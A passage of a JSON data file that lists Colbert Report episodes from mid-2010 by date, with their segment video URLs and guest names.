        "http://thecolbertreport.cc.com/videos/cchudg/robert-c--byrd-dies-at-92",
        "http://thecolbertreport.cc.com/videos/t7kbm8/rolling-stone-article-on-mcchrystal---michael-hastings",
        "http://thecolbertreport.cc.com/videos/nxs1np/doomsday-bunkers",
        "http://thecolbertreport.cc.com/videos/kpz62f/john-waters",
        "http://thecolbertreport.cc.com/videos/q1un38/sign-off---goodnight"
      ],
      "guest": "Michael Hastings, John Waters"
    },
    {
      "date": "2010-06-29",
      "videos": [
        "http://thecolbertreport.cc.com/videos/8w7w4q/intro---6-29-10",
        "http://thecolbertreport.cc.com/videos/5i29xg/supreme-court-justice-sweetness",
        "http://thecolbertreport.cc.com/videos/gxmj8l/basketcase---stephie-s-knicks-hoop-de-doo-pt--1",
        "http://thecolbertreport.cc.com/videos/cxtlq7/lube-job",
        "http://thecolbertreport.cc.com/videos/t7eba8/julian-castro",
        "http://thecolbertreport.cc.com/videos/6s4ag9/sign-off---sweetness"
      ],
      "guest": "Mayor Julian Castro"
    },
    {
      "date": "2010-06-30",
      "videos": [
        "http://thecolbertreport.cc.com/videos/4nay3b/mysteries-of-the-ancient-unknown---king-tut-s-penis-pt--1",
        "http://thecolbertreport.cc.com/videos/200t0y/cold-war-update---north-korea---russian-spies",
        "http://thecolbertreport.cc.com/videos/85xlkw/nicholas-carr",
        "http://thecolbertreport.cc.com/videos/zz75v5/sign-off---goodnight"
      ],
      "guest": "Nicholas Carr"
    },
    {
      "date": "2010-07-01",
      "videos": [
        "http://thecolbertreport.cc.com/videos/qkh2oy/intro---7-1-10",
        "http://thecolbertreport.cc.com/videos/p1rz8m/al-qaeda-starts-inspire-magazine",
        "http://thecolbertreport.cc.com/videos/ytd0xh/threatdown---dawn--actual-food---texas-gop",
        "http://thecolbertreport.cc.com/videos/zgf08n/tangelo-american-john-boehner",
        "http://thecolbertreport.cc.com/videos/7p27ga/manny-howard",
        "http://thecolbertreport.cc.com/videos/lruog2/sign-off---obsessive-compulsive-disorder"
      ],
      "guest": "Manny Howard"
    },
    {
      "date": "2010-07-05",
      "videos": [
        "http://thecolbertreport.cc.com/videos/88l8y3/stephen-is-sick",
        "http://thecolbertreport.cc.com/videos/yw04k6/electronic-frontier-foundation---cindy-cohn",
        "http://thecolbertreport.cc.com/videos/2vgxvc/unemployment-benefits---paul-krugman",
        "http://thecolbertreport.cc.com/videos/tod2oy/michio-kaku",
        "http://thecolbertreport.cc.com/videos/59nr33/sign-off---the-hot-zone"
      ],
      "guest": "Paul Krugman, Dr. Michio Kaku"
    },
    {
      "date": "2010-07-06",
      "videos": [
        "http://thecolbertreport.cc.com/videos/jogb92/intro---7-6-10",
        "http://thecolbertreport.cc.com/videos/vh6d9y/latest-soap-opera-news",
        "http://thecolbertreport.cc.com/videos/v4t63q/the-word---the-white-stuff",
        "http://thecolbertreport.cc.com/videos/52xc1z/i-s-on-edjukashun---loyola--texas-textbooks---wal-mart",
        "http://thecolbertreport.cc.com/videos/44dhom/garret-keizer",
        "http://thecolbertreport.cc.com/videos/p9lstk/sign-off---goodnight"
      ],
      "guest": "Garret Keizer"
    },
    {
      "date": "2010-07-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/yx0x8s/the-carell-corral",
        "http://thecolbertreport.cc.com/videos/u8pmv7/the-economist-photoshops-obama-s-picture",
        "http://thecolbertreport.cc.com/videos/2vaaww/thought-for-food---kentucky-tuna---grilled-cheese-burger-melt",
        "http://thecolbertreport.cc.com/videos/7ctnwz/formula-401--beauty-from-my-beast",
        "http://thecolbertreport.cc.com/videos/s7mibo/steve-carell",
        "http://thecolbertreport.cc.com/videos/ytvd7r/sign-off---2010-sexy-spermatozoa-calendar"
      ],
      "guest": "Steve Carell"
    },
    {
      "date": "2010-07-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/381yrb/intro---7-8-10",
        "http://thecolbertreport.cc.com/videos/x5lln0/modest-con-2010",
        "http://thecolbertreport.cc.com/videos/zjdl0i/automatics-for-the-people---ilya-shapiro---jackie-hilly",
        "http://thecolbertreport.cc.com/videos/eieifn/emergency-thought-for-food---candwich-setback",
        "http://thecolbertreport.cc.com/videos/nlmfgk/arturo-rodriguez",
        "http://thecolbertreport.cc.com/videos/oc0gsm/sign-off---go-get-a-tan"
      ],
      "guest": "Arturo Rodriguez"
    },
    {
      "date": "2010-07-26",
      "videos": [
        "http://thecolbertreport.cc.com/videos/xsaeav/intro---7-26-10",
        "http://thecolbertreport.cc.com/videos/snrn4u/stephen-s-eco-vacation",
        "http://thecolbertreport.cc.com/videos/qqashr/racial-pro-firing",
        "http://thecolbertreport.cc.com/videos/1axxh8/nailed--em---polka-piracy",
        "http://thecolbertreport.cc.com/videos/u5kfga/hephzibah-anderson",
        "http://thecolbertreport.cc.com/videos/rcl3ml/sign-off---bud-light-lime"
      ],
      "guest": "Hephzibah Anderson"
    },
    {
      "date": "2010-07-27",
      "videos": [
        "http://thecolbertreport.cc.com/videos/aiaw4g/intro---7-27-10",
        "http://thecolbertreport.cc.com/videos/56iw57/bp-s-live-hayward-cam",
        "http://thecolbertreport.cc.com/videos/m571z2/that-s-the-way-i-leak-it---tom-blanton",
        "http://thecolbertreport.cc.com/videos/431v9v/tip-wag---baby-gap--dick-cheney---plants",
        "http://thecolbertreport.cc.com/videos/2afxlp/kevin-kline",
        "http://thecolbertreport.cc.com/videos/y6qd20/sign-off---goodnight"
      ],
      "guest": "Thomas S. Blanton, Kevin Kline"
    },
    {
      "date": "2010-07-28",
      "videos": [
        "http://thecolbertreport.cc.com/videos/it4pai/obama-blows-off-the-boy-scouts",
        "http://thecolbertreport.cc.com/videos/ce9wme/the-word---ownership-society",
        "http://thecolbertreport.cc.com/videos/k9y4mw/republican-gubernatorial-primary-battle-watch--010---tennessee",
        "http://thecolbertreport.cc.com/videos/hjiro1/elon-musk",
        "http://thecolbertreport.cc.com/videos/fl5n9q/sign-off---bit-of-advice"
      ],
      "guest": "Elon Musk"
    },
    {
      "date": "2010-07-29",
      "videos": [
        "http://thecolbertreport.cc.com/videos/cjuayn/intro---7-29-10",
        "http://thecolbertreport.cc.com/videos/dzk032/the-oil-is-missing",
        "http://thecolbertreport.cc.com/videos/i9hga3/thought-for-food---cereal--foot-long-cheeseburger---ecobot-iii",
        "http://thecolbertreport.cc.com/videos/jt67k1/apology-box",
        "http://thecolbertreport.cc.com/videos/sdjfj9/andy-cohen",
        "http://thecolbertreport.cc.com/videos/6hqby7/sign-off---cocktails"
      ],
      "guest": "Andy Cohen"
    },
    {
      "date": "2010-08-02",
      "videos": [
        "http://thecolbertreport.cc.com/videos/07zpy3/intro---8-2-10",
        "http://thecolbertreport.cc.com/videos/o9k8cr/stephen-might-be-gay",
        "http://thecolbertreport.cc.com/videos/wx3505/sport-report---london-olympics---illegal-bullfighting",
        "http://thecolbertreport.cc.com/videos/3dwyx0/alpha-dog-of-the-week---david-h--brooks",
        "http://thecolbertreport.cc.com/videos/ln5q1u/jimmy-cliff"
      ],
      "guest": "Jimmy Cliff"
    },
    {
      "date": "2010-08-03",
      "videos": [
        "http://thecolbertreport.cc.com/videos/s8t2k9/brett-favre-retires-again",
        "http://thecolbertreport.cc.com/videos/noj1lw/consumer-protection-agency---barney-frank",
        "http://thecolbertreport.cc.com/videos/jrpte4/republican-gubernatorial-primary-battle-watch--010---basil-marceaux-com",
        "http://thecolbertreport.cc.com/videos/a5r0r5/laura-ingraham",
        "http://thecolbertreport.cc.com/videos/9838f3/sign-off---credit-card-agreement"
      ],
      "guest": "Laura Ingraham"
    },
    {
      "date": "2010-08-04",
      "videos": [
        "http://thecolbertreport.cc.com/videos/eirad0/basil-marceaux-com---obama-s-birthday",
        "http://thecolbertreport.cc.com/videos/4mbc26/p-k--winsome---black-viewer-ratings",
        "http://thecolbertreport.cc.com/videos/vhx4eu/threat-standdown---monkey-terrorism",
        "http://thecolbertreport.cc.com/videos/t5nlmh/michael-posner",
        "http://thecolbertreport.cc.com/videos/gc9gia/sign-off---nielsen-mandela"
      ],
      "guest": "Michael Posner"
    },
    {
      "date": "2010-08-05",
      "videos": [
        "http://thecolbertreport.cc.com/videos/tsl05q/intro---8-5-10",
        "http://thecolbertreport.cc.com/videos/1qu0ts/how-to-ruin-same-sex-marriages",
        "http://thecolbertreport.cc.com/videos/gw1rft/pope-s-baseball-cap---catholictv",
        "http://thecolbertreport.cc.com/videos/bdzvwl/savion-glover",
        "http://thecolbertreport.cc.com/videos/our78a/sign-off---tap-dancing"
      ],
      "guest": "Savion Glover"
    },
    {
      "date": "2010-08-10",
      "videos": [
        "http://thecolbertreport.cc.com/videos/cfbxpk/intro---8-10-10",
        "http://thecolbertreport.cc.com/videos/40r2zf/honoring-martin-luther-king",
        "http://thecolbertreport.cc.com/videos/jbgt2s/citizenship-down---akhil-amar",
        "http://thecolbertreport.cc.com/videos/v2az23/alpha-dog-of-the-week---steven-slater",
        "http://thecolbertreport.cc.com/videos/uhmewn/dylan-ratigan",
        "http://thecolbertreport.cc.com/videos/p3wgd1/sign-off---goodnight"
      ],
      "guest": "Dylan Ratigan"
    },
    {
      "date": "2010-08-11",
      "videos": [
        "http://thecolbertreport.cc.com/videos/jwpn0p/moral-compass-5000-action-center",
        "http://thecolbertreport.cc.com/videos/tpcehb/david-finkel",
        "http://thecolbertreport.cc.com/videos/j0nge7/sign-off---goodnight"
      ],
      "guest": "David Finkel"
    },
    {
      "date": "2010-08-12",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ibivj9/intro---8-12-10",
        "http://thecolbertreport.cc.com/videos/t6cmn9/happy-ramadan",
        "http://thecolbertreport.cc.com/videos/tavgu2/the-word---weapon-of-mass-construction",
        "http://thecolbertreport.cc.com/videos/obv2rl/senior-moment",
        "http://thecolbertreport.cc.com/videos/lx17lm/chuck-close",
        "http://thecolbertreport.cc.com/videos/h6dwnn/sign-off---chuck-close-books"
      ],
      "guest": "Chuck Close"
    },
    {
      "date": "2010-08-16",
      "videos": [
        "http://thecolbertreport.cc.com/videos/q61axv/growing-intelligence-community---richard-clarke",
        "http://thecolbertreport.cc.com/videos/yh08ag/invasion-of-the-country-snatchers",
        "http://thecolbertreport.cc.com/videos/gr3fyt/john-fetterman",
        "http://thecolbertreport.cc.com/videos/6ksdhb/sign-off---starbucks-latte"
      ],
      "guest": "Richard Clarke, John Fetterman"
    },
    {
      "date": "2010-08-17",
      "videos": [
        "http://thecolbertreport.cc.com/videos/dlrtyi/intro---8-17-10",
        "http://thecolbertreport.cc.com/videos/c3sn86/newsweek-ranks-the-world-s-best-countries",
        "http://thecolbertreport.cc.com/videos/2hdefm/better-know-a-lobby---american-meat-institute",
        "http://thecolbertreport.cc.com/videos/tno3pg/fox-news-and-republican-party-make-it-official",
        "http://thecolbertreport.cc.com/videos/2kzgs4/barry-levine",
        "http://thecolbertreport.cc.com/videos/xsqp9j/sign-off---newsweek"
      ],
      "guest": "Barry Levine"
    },
    {
      "date": "2010-08-18",
      "videos": [
        "http://thecolbertreport.cc.com/videos/vby4js/intro---8-18-10",
        "http://thecolbertreport.cc.com/videos/50c2du/brett-favre-returns-to-football",
        "http://thecolbertreport.cc.com/videos/08wn77/the-word---borderline-personality",
        "http://thecolbertreport.cc.com/videos/l06vi1/don-t-shoot-the-schlessinger",
        "http://thecolbertreport.cc.com/videos/389e2m/thomas-french",
        "http://thecolbertreport.cc.com/videos/b2scuj/sign-off---sharpened-broom-handle"
      ],
      "guest": "Thomas French"
    },
    {
      "date": "2010-08-19",
      "videos": [
        "http://thecolbertreport.cc.com/videos/x0zwn9/intro---8-19-10",
        "http://thecolbertreport.cc.com/videos/m4f5im/the-word---what-if-you-threw-a-peace-and-nobody-came-",
        "http://thecolbertreport.cc.com/videos/2rjk08/all-s-well-that-ends-oil-well---michael-blum",
        "http://thecolbertreport.cc.com/videos/c2uztk/jon-krakauer",
        "http://thecolbertreport.cc.com/videos/g9w04r/sign-off---goodnight"
      ],
      "guest": "Jon Krakauer"
    },
    {
      "date": "2010-08-23",
      "videos": [
        "http://thecolbertreport.cc.com/videos/zn0m8s/stephen-wins-an-emmy",
        "http://thecolbertreport.cc.com/videos/xa3l6x/the-word---losing-his-religion",
        "http://thecolbertreport.cc.com/videos/8vazj8/aqua-threatdown---oyster-sluts--japanese-hackers---israeli-regulators",
        "http://thecolbertreport.cc.com/videos/jjg6uf/leslie-kean",
        "http://thecolbertreport.cc.com/videos/gbrydj/sign-off---balloon"
      ],
      "guest": "Leslie Kean"
    },
    {
      "date": "2010-08-24",
      "videos": [
        "http://thecolbertreport.cc.com/videos/8v2r6r/intro---8-24-10",
        "http://thecolbertreport.cc.com/videos/ay7pky/terror-bunker-5200",
        "http://thecolbertreport.cc.com/videos/rxmuip/the-word---control-self-delete",
        "http://thecolbertreport.cc.com/videos/7azwuj/mahmoody-blues",
        "http://thecolbertreport.cc.com/videos/vly30s/jeffrey-goldberg",
        "http://thecolbertreport.cc.com/videos/p0468k/sign-off---sanitized-goodnight"
      ],
      "guest": "Jeffrey Goldberg"
    },
    {
      "date": "2010-08-25",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ckwof5/john-mccain-s-victorious-defeat",
        "http://thecolbertreport.cc.com/videos/bn16zn/stephen-colbert-university---andrew-hacker",
        "http://thecolbertreport.cc.com/videos/nmp9j3/mysteries-of-the-ancient-unknown---king-tut-s-penis-pt--2",
        "http://thecolbertreport.cc.com/videos/boejnl/heidi-cullen",
        "http://thecolbertreport.cc.com/videos/8mv6il/sign-off---calculator"
      ],
      "guest": "Andrew Hacker, Heidi Cullen"
    },
    {
      "date": "2010-08-26",
      "videos": [
        "http://thecolbertreport.cc.com/videos/8g8jfw/intro---8-26-10",
        "http://thecolbertreport.cc.com/videos/cg8fb2/fox-news-job-opening",
        "http://thecolbertreport.cc.com/videos/3k8c17/glenn-livid",
        "http://thecolbertreport.cc.com/videos/ozbh2e/you-mosque-be-kidding",
        "http://thecolbertreport.cc.com/videos/idhto6/richard-engel",
        "http://thecolbertreport.cc.com/videos/054o86/sign-off---speaking-fee"
      ],
      "guest": "Richard Engel"
    },
    {
      "date": "2010-09-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/99y0f6/intro---9-7-10",
        "http://thecolbertreport.cc.com/videos/xvxdbg/geese-witherspoon",
        "http://thecolbertreport.cc.com/videos/os39h8/better-know-a-district---delaware-s-at-large---mike-castle-update",
        "http://thecolbertreport.cc.com/videos/ylp5nt/anthony-romero",
        "http://thecolbertreport.cc.com/videos/olfody/sign-off---welcome-home-show"
      ],
      "guest": "Anthony Romero"
    },
    {
      "date": "2010-09-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ynyu8x/intro---9-8-10",
        "http://thecolbertreport.cc.com/videos/kmgrcb/been-there--won-that---joe-biden---yogi-berra",
        "http://thecolbertreport.cc.com/videos/l21o2y/been-there--won-that---ray-odierno",
        "http://thecolbertreport.cc.com/videos/dp7uzb/joe-biden",
        "http://thecolbertreport.cc.com/videos/r1r2jw/sign-off---thanks-to-the-returning-troops"
      ],
      "guest": "Vice President Joe Biden, Gen. Raymond Odierno"
    },
    {
      "date": "2010-09-09",
      "videos": [
        "http://thecolbertreport.cc.com/videos/txd70l/been-there--won-that---jim-webb",
        "http://thecolbertreport.cc.com/videos/tvmzxz/been-there--won-that---david-petraeus",
        "http://thecolbertreport.cc.com/videos/9543jt/brent-cummings---josh-bleill"
      ],
      "guest": "Sen. Jim Webb, Lt. Col. Brent Cummings, John Legend"
    },
    {
      "date": "2010-09-13",
      "videos": [
        "http://thecolbertreport.cc.com/videos/4q0lgz/intro---9-13-10",
        "http://thecolbertreport.cc.com/videos/1x4nj0/microwave-programming",
        "http://thecolbertreport.cc.com/videos/wzt5ev/bears---balls---american-apparel---chocolatey",
        "http://thecolbertreport.cc.com/videos/nwwxfb/stop-sending-live-animals",
        "http://thecolbertreport.cc.com/videos/hr5uxa/lisa-birnbach",
        "http://thecolbertreport.cc.com/videos/w7kfgs/sign-off---goodnight"
      ],
      "guest": "Lisa Birnbach"
    },
    {
      "date": "2010-09-14",
      "videos": [
        "http://thecolbertreport.cc.com/videos/zipkzm/intro---9-14-10",
        "http://thecolbertreport.cc.com/videos/pet2x5/peta-criticizes-joe-biden",
        "http://thecolbertreport.cc.com/videos/7cbxuw/the-word---mutually-assured-coercion",
        "http://thecolbertreport.cc.com/videos/oh49ge/luther-campbell-opposes-ground-zero-mosque",
        "http://thecolbertreport.cc.com/videos/yevohc/sean-wilentz",
        "http://thecolbertreport.cc.com/videos/fugenz/sign-off---goodnight"
      ],
      "guest": "Sean Wilentz"
    },
    {
      "date": "2010-09-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/0hpaxs/intro---9-15-10",
        "http://thecolbertreport.cc.com/videos/f8g0cq/libertea",
        "http://thecolbertreport.cc.com/videos/7v15m5/atone-phone---joan-rivers-calls",
        "http://thecolbertreport.cc.com/videos/n9nk9d/saul-griffith",
        "http://thecolbertreport.cc.com/videos/mjozqh/sign-off---world-changing-announcement"
      ],
      "guest": "Saul Griffith"
    },
    {
      "date": "2010-09-16",
      "videos": [
        "http://thecolbertreport.cc.com/videos/uj8r4c/march-to-keep-fear-alive-announcement",
        "http://thecolbertreport.cc.com/videos/5klha6/threatdown---bedbugs---environmentalists---jerome-goddard",
        "http://thecolbertreport.cc.com/videos/pck634/lawrence-o-donnell",
        "http://thecolbertreport.cc.com/videos/h5yz8n/sign-off---march-to-keep-fear-alive"
      ],
      "guest": "Lawrence O'Donnell"
    },
    {
      "date": "2010-09-20",
      "videos": [
        "http://thecolbertreport.cc.com/videos/cahpkw/intro---9-20-10",
        "http://thecolbertreport.cc.com/videos/1fmwjo/christine-o-donnell-witch-test",
        "http://thecolbertreport.cc.com/videos/diatjd/tip-wag---chilean-miners--portland-press-herald---isa-blyth",
        "http://thecolbertreport.cc.com/videos/a4y4ey/march-to-keep-fear-alive-media-coverage",
        "http://thecolbertreport.cc.com/videos/b65ofd/pavement"
      ],
      "guest": "Pavement"
    },
    {
      "date": "2010-09-21",
      "videos": [
        "http://thecolbertreport.cc.com/videos/yi7cbo/intro---9-21-10",
        "http://thecolbertreport.cc.com/videos/t99up5/in-poor-taste---mark-shriver",
        "http://thecolbertreport.cc.com/videos/2vrsvg/colbertslist",
        "http://thecolbertreport.cc.com/videos/tnb3an/eric-schmidt",
        "http://thecolbertreport.cc.com/videos/kecowj/sign-off---sign-up-for-the-march-to-keep-fear-alive"
      ],
      "guest": "Eric Schmidt"
    },
    {
      "date": "2010-09-22",
      "videos": [
        "http://thecolbertreport.cc.com/videos/q8xj8c/intro---9-22-10",
        "http://thecolbertreport.cc.com/videos/gcap67/the-christine-o-donnell-clip-predictor-3000",
        "http://thecolbertreport.cc.com/videos/xq0472/the-word---the-more-you-no",
        "http://thecolbertreport.cc.com/videos/xr7q4y/fallback-position---migrant-worker-pt--1",
        "http://thecolbertreport.cc.com/videos/kgnwdf/guillermo-del-toro",
        "http://thecolbertreport.cc.com/videos/lnpblj/sign-off---stephen-won-t-forgive-you"
      ],
      "guest": "Guillermo Del Toro"
    },
    {
      "date": "2010-09-23",
      "videos": [
        "http://thecolbertreport.cc.com/videos/e9ulyf/intro---9-23-10",
        "http://thecolbertreport.cc.com/videos/puxqvp/fallback-position---migrant-worker-pt--2",
        "http://thecolbertreport.cc.com/videos/imp10g/sanchez-bump",
        "http://thecolbertreport.cc.com/videos/937jzh/oscar-goodman",
        "http://thecolbertreport.cc.com/videos/hitep1/sign-off---american-history-lesson"
      ],
      "guest": "Oscar Goodman"
    },
    {
      "date": "2010-09-27",
      "videos": [
        "http://thecolbertreport.cc.com/videos/esvw5v/intro---9-27-10",
        "http://thecolbertreport.cc.com/videos/aychpz/corn-packer-apology",
        "http://thecolbertreport.cc.com/videos/nc19il/the-delawert-report",
        "http://thecolbertreport.cc.com/videos/pcae92/the-word---army-of-mum",
        "http://thecolbertreport.cc.com/videos/kby55r/yahweh-or-no-way---ihop---antonio-federici-ad",
        "http://thecolbertreport.cc.com/videos/y2afey/ken-burns",
        "http://thecolbertreport.cc.com/videos/g2pys1/sign-off---goodnight"
      ],
      "guest": "Ken Burns"
    },
    {
      "date": "2010-09-28",
      "videos": [
        "http://thecolbertreport.cc.com/videos/s437p7/intro---9-28-10",
        "http://thecolbertreport.cc.com/videos/gspyir/left-behind---paul-begala",
        "http://thecolbertreport.cc.com/videos/57ib6e/terror-a-new-one",
        "http://thecolbertreport.cc.com/videos/ut4vp1/ross-douthat",
        "http://thecolbertreport.cc.com/videos/0pm7c2/sign-off---democratic-grave"
      ],
      "guest": "Paul Begala, Ross Douthat"
    },
    {
      "date": "2010-09-29",
      "videos": [
        "http://thecolbertreport.cc.com/videos/umvy3w/march-to-keep-fear-alive-insanity-bus",
        "http://thecolbertreport.cc.com/videos/kup6co/the-word---original-spin",
        "http://thecolbertreport.cc.com/videos/z1c69t/threatdown---record-breaking-gays--koalas---purell",
        "http://thecolbertreport.cc.com/videos/q56zhc/steven-rattner",
        "http://thecolbertreport.cc.com/videos/kn5pkq/sign-off---sign-up-for-the-march-to-keep-fear-alive"
      ],
      "guest": "Steve Rattner"
    },
    {
      "date": "2010-09-30",
      "videos": [
        "http://thecolbertreport.cc.com/videos/umgd4n/intro---9-30-10",
        "http://thecolbertreport.cc.com/videos/xic7q8/president-obama-endorses-the-rally-to-restore-sanity",
        "http://thecolbertreport.cc.com/videos/xd5pkh/droid-rage",
        "http://thecolbertreport.cc.com/videos/w8i263/stat-of-the-union",
        "http://thecolbertreport.cc.com/videos/h7gmgz/aaron-sorkin",
        "http://thecolbertreport.cc.com/videos/7zrc6h/sign-off---march-to-keep-fear-alive-costumes"
      ],
      "guest": "Aaron Sorkin"
    },
    {
      "date": "2010-10-04",
      "videos": [
        "http://thecolbertreport.cc.com/videos/vwiap8/intro---10-4-10",
        "http://thecolbertreport.cc.com/videos/h7fctl/we-world-war-won-it",
        "http://thecolbertreport.cc.com/videos/k8t4ao/the-word---it-s-a-small-minded-world",
        "http://thecolbertreport.cc.com/videos/nbdcz5/tip-wag---tea-party-coloring-book---calm-legislation",
        "http://thecolbertreport.cc.com/videos/pl2b2g/eugene-robinson",
        "http://thecolbertreport.cc.com/videos/3w0ogs/sign-off---matching-donor"
      ],
      "guest": "Eugene Robinson"
    },
    {
      "date": "2010-10-05",
      "videos": [
        "http://thecolbertreport.cc.com/videos/72j4yn/intro---10-5-10",
        "http://thecolbertreport.cc.com/videos/9xty22/american-sexual-habits",
        "http://thecolbertreport.cc.com/videos/0xyglo/gang-busters---john-burnett",
        "http://thecolbertreport.cc.com/videos/e4gleb/langur-monkey-security",
        "http://thecolbertreport.cc.com/videos/98qo87/leon-botstein",
        "http://thecolbertreport.cc.com/videos/gi2fk6/sign-off---goodnight"
      ],
      "guest": "Leon Botstein"
    },
    {
      "date": "2010-10-06",
      "videos": [
        "http://thecolbertreport.cc.com/videos/pg4r1d/intro---10-6-10",
        "http://thecolbertreport.cc.com/videos/gu3bg9/tiny-triumphs---environmentalist-ear-pollution",
        "http://thecolbertreport.cc.com/videos/rex0nc/rawesome-foods-raid",
        "http://thecolbertreport.cc.com/videos/6krvaq/mavis-staples---jeff-tweedy",
        "http://thecolbertreport.cc.com/videos/01gaiu/sign-off---you-are-not-alone"
      ],
      "guest": "Mavis Staples &amp; Jeff Tweedy"
    },
    {
      "date": "2010-10-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/sy1j26/indecision-2010---revenge-of-the-fallen---fearstock-com",
        "http://thecolbertreport.cc.com/videos/5qjigz/proposition-19---joseph-califano---gary-johnson",
        "http://thecolbertreport.cc.com/videos/rzuziw/donorschoose-org-fear-drawings",
        "http://thecolbertreport.cc.com/videos/077dy4/davis-guggenheim",
        "http://thecolbertreport.cc.com/videos/th4oe4/sign-off---don-t-go-to-donorschoose-com"
      ],
      "guest": "Davis Guggenheim"
    },
    {
      "date": "2010-10-11",
      "videos": [
        "http://thecolbertreport.cc.com/videos/mnxgqn/intro---10-11-10",
        "http://thecolbertreport.cc.com/videos/2buyr8/rich-iott-wears-a-nazi-uniform",
        "http://thecolbertreport.cc.com/videos/f1n1ah/threatdown---muslim-edition",
        "http://thecolbertreport.cc.com/videos/6x3w7h/formula-4-your-eyes-only",
        "http://thecolbertreport.cc.com/videos/l23gil/robert-reich",
        "http://thecolbertreport.cc.com/videos/6314hj/sign-off---stephen-needs-a-place-to-hold-his-march"
      ],
      "guest": "Robert Reich"
    },
    {
      "date": "2010-10-12",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ksbkyk/intro---10-12-10",
        "http://thecolbertreport.cc.com/videos/que3dz/101-year-old-woman-becomes-a-u-s--citizen",
        "http://thecolbertreport.cc.com/videos/xpawsw/tip-wag---peabody-public-schools--andy-rooney---ground-zero-mosque-design",
        "http://thecolbertreport.cc.com/videos/o656bc/merch-to-keep-fear-alive",
        "http://thecolbertreport.cc.com/videos/bncunr/brendan-steinhauser",
        "http://thecolbertreport.cc.com/videos/4i1iy2/sign-off---apple-filled-with-razor-blades"
      ],
      "guest": "Brendan Steinhauser"
    },
    {
      "date": "2010-10-13",
      "videos": [
        "http://thecolbertreport.cc.com/videos/nkf1gw/intro---10-13-10",
        "http://thecolbertreport.cc.com/videos/40azz5/america-helps-rescue-chilean-miners",
        "http://thecolbertreport.cc.com/videos/fg5dcw/sport-report---steroids--commonwealth-games---brett-favre-s-sexting",
        "http://thecolbertreport.cc.com/videos/nq3g54/tax-shelter-skelter",
        "http://thecolbertreport.cc.com/videos/ip94pd/austan-goolsbee",
        "http://thecolbertreport.cc.com/videos/7n0fzv/sign-off---tic-tac-toe-with-austan-goolsbee"
      ],
      "guest": "Austan Goolsbee"
    },
    {
      "date": "2010-10-14",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ke3ug4/transitive-property-of-christine-o-donnell",
        "http://thecolbertreport.cc.com/videos/jvi6id/people-who-are-destroying-america---landscaping-goats",
        "http://thecolbertreport.cc.com/videos/8kgt7i/rally-to-restore-sanity-and-or-fear-chinatown-bus-tickets",
        "http://thecolbertreport.cc.com/videos/wc2nwv/bill-bryson",
        "http://thecolbertreport.cc.com/videos/ns0u0b/sign-off---oprah-is-wonderful"
      ],
      "guest": "Bill Bryson"
    },
    {
      "date": "2010-10-25",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ou6z90/indecision-2010---revenge-of-the-fallen---sean-bielat---ken-buck",
        "http://thecolbertreport.cc.com/videos/t96zw6/the-word---midterm-erection",
        "http://thecolbertreport.cc.com/videos/r3cpem/who-s-honoring-me-now----colbert-nation-five-years-of-excellence-award",
        "http://thecolbertreport.cc.com/videos/tx8w6w/nicholas-negroponte",
        "http://thecolbertreport.cc.com/videos/hjbcjo/sign-off---fifth-anniversary-portrait"
      ],
      "guest": "Nicholas Negroponte"
    },
    {
      "date": "2010-10-26",
      "videos": [
        "http://thecolbertreport.cc.com/videos/vtn4dg/intro---10-26-10",
        "http://thecolbertreport.cc.com/videos/upm6ow/stephen-appears-in-the-new-york-times-crossword-puzzle",
        "http://thecolbertreport.cc.com/videos/rh943m/the-word---invisible-inc-",
        "http://thecolbertreport.cc.com/videos/57deny/food-insurance-insurance",
        "http://thecolbertreport.cc.com/videos/9dol4n/garry-wills",
        "http://thecolbertreport.cc.com/videos/ifnetg/sign-off---stream-elvis-costello-s-national-ransom"
      ],
      "guest": "Gary Wills"
    },
    {
      "date": "2010-10-27",
      "videos": [
        "http://thecolbertreport.cc.com/videos/qjfe6u/exclusive---have-you-seen-the-ghost-of-jon-",
        "http://thecolbertreport.cc.com/videos/iyha0d/intro---10-27-10",
        "http://thecolbertreport.cc.com/videos/a393lf/rand-paul-supporter-stomps-on-liberal-activist-s-head",
        "http://thecolbertreport.cc.com/videos/ah47vl/indecision-2010---revenge-of-the-fallen---tom-perriello",
        "http://thecolbertreport.cc.com/videos/k3z37d/snooki-halloween-costume---spooky-rally-song",
        "http://thecolbertreport.cc.com/videos/tmruw9/apolo-ohno",
        "http://thecolbertreport.cc.com/videos/g0i5r2/sign-off---2010-election-map-from-denny-s"
      ],
      "guest": "Rep. Tom Perriello, Apolo Anton Ohno"
    },
    {
      "date": "2010-10-28",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ea746g/the-mcrib-is-back",
        "http://thecolbertreport.cc.com/videos/y2nj3n/fear-for-all-pt--1",
        "http://thecolbertreport.cc.com/videos/ttx9jf/fear-for-all-pt--2",
        "http://thecolbertreport.cc.com/videos/el1mv0/maira-kalman",
        "http://thecolbertreport.cc.com/videos/p6c0ah/sign-off---see-you-at-the-rally"
      ],
      "guest": "Maira Kalman"
    },
    {
      "date": "2010-11-01",
      "videos": [
        "http://thecolbertreport.cc.com/videos/4or1uk/intro---11-1-10",
        "http://thecolbertreport.cc.com/videos/pjth2k/a-fond-look-back-at-the-rally",
        "http://thecolbertreport.cc.com/videos/6y87u2/midterm-senate-races---nevada--alaska---delaware",
        "http://thecolbertreport.cc.com/videos/ghbjcp/hispanic-and-gay-voters-should-stay-at-home",
        "http://thecolbertreport.cc.com/videos/r4udbe/jonathan-alter",
        "http://thecolbertreport.cc.com/videos/h06l8n/sign-off---don-t-forget-to-vote"
      ],
      "guest": "Jonathan Alter"
    },
    {
      "date": "2010-11-02",
      "videos": [
        "http://thecolbertreport.cc.com/videos/q6wjad/indecision-2010---intro---11-2-10",
        "http://thecolbertreport.cc.com/videos/5y5ul8/indecision-2010---gop-takes-house",
        "http://thecolbertreport.cc.com/videos/yubkdk/indecision-2010---david-frum",
        "http://thecolbertreport.cc.com/videos/ii11zs/indecision-2010---katrina-vanden-heuvel",
        "http://thecolbertreport.cc.com/videos/fpxe9g/indecision-2010---sign-off---election-to-end-all-elections"
      ],
